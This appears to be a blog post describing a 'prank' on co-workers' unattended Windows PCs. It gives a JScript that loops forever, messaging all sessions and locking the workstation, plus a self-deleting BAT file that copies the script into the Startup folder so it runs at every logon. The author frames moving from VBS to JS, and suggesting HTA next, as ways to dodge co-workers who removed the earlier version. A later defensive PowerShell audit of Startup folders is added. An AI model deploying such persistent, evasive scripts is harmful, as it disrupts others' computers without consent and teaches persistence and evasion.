Fun with Unattended Workstations Part II

So my co-workers figured out that it was a VBScript file. They were able to stop the script by searching for .VBS files on the system and then deleting the suspicious ones. This motivated me to write the script in another language, so this time I have come up with Windows JS, and the script goes like this:

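// Infinite loop: no exit condition
for (var i = 0; ; i++)
{
    var aj = new ActiveXObject("WScript.Shell");
    // Show a message on every session (/V verbose, /W wait for acknowledgement)
    aj.run("msg * /V /W 'AJ is watching you !' ");
    WScript.sleep(2000);
    // Lock the workstation
    aj.run("rundll32 user32.dll, LockWorkStation");
    // Wait two minutes before repeating
    WScript.sleep(120000);
}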

The script is an infinite FOR loop: it creates a WScript.Shell ActiveXObject for its .run method and calls WScript.sleep to pause between steps. I also wanted to copy this Windows JS file to the Startup folder but was unable to do it from within the script, so a BAT script came to my rescue.

@Echo Off
copy "start.js" "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
call start.js
del AJ.bat

The BAT script copies the Windows JS file to the Startup folder, runs the JS file, and then deletes itself.
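
From the defender's side, the Startup-folder copy is what makes this kind of script easy to find. The following PowerShell audit is an added example, not part of the original post: it lists script files in the per-user and all-users Startup folders and shows any script-host processes currently running. The extension list and content patterns are assumptions chosen to match the scripts in this series.

```powershell
# Added example: audit Startup folders for script files that run at logon.
# The extension list and content patterns are assumptions based on this post.
$scriptExtensions = '.js', '.jse', '.vbs', '.vbe', '.wsf', '.hta', '.bat', '.cmd'
$patterns         = 'WScript\.Shell', 'LockWorkStation', '\bmsg\s+\*'

# Per-user and all-users Startup folders
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
) | Where-Object { $_ -and (Test-Path -LiteralPath $_) }

$findings = foreach ($dir in $startupDirs) {
    # -Force includes hidden files
    Get-ChildItem -LiteralPath $dir -File -Force |
        Where-Object { $scriptExtensions -contains $_.Extension.ToLower() } |
        ForEach-Object {
            $file = $_
            # Collect the distinct pattern hits inside the file (case-insensitive)
            $hits = Select-String -LiteralPath $file.FullName -Pattern $patterns -AllMatches |
                ForEach-Object { $_.Matches.Value } |
                Sort-Object -Unique
            [pscustomobject]@{
                Path     = $file.FullName
                Created  = $file.CreationTime
                Modified = $file.LastWriteTime
                SHA256   = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256).Hash
                Matches  = $hits -join ', '
            }
        }
}

if ($findings) {
    $findings | Format-List
} else {
    'No script files found in the Startup folders.'
}

# Script hosts that are running right now, with the file each one was started on
Get-CimInstance Win32_Process -Filter "Name='wscript.exe' OR Name='cscript.exe' OR Name='mshta.exe'" |
    Select-Object ProcessId, Name, CommandLine |
    Format-List
```

A file can be reviewed from its Path and Matches before removal, and the CommandLine column shows which script a running wscript.exe was launched with.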

Quick thoughts: what if they are able to find this Windows JS file as well? Not to worry, HTA would help us out (comment if you know any other interesting methods/ways). Hope this post was interesting; keep watching this blog for more interesting posts.
Feel free to comment, share and subscribe.
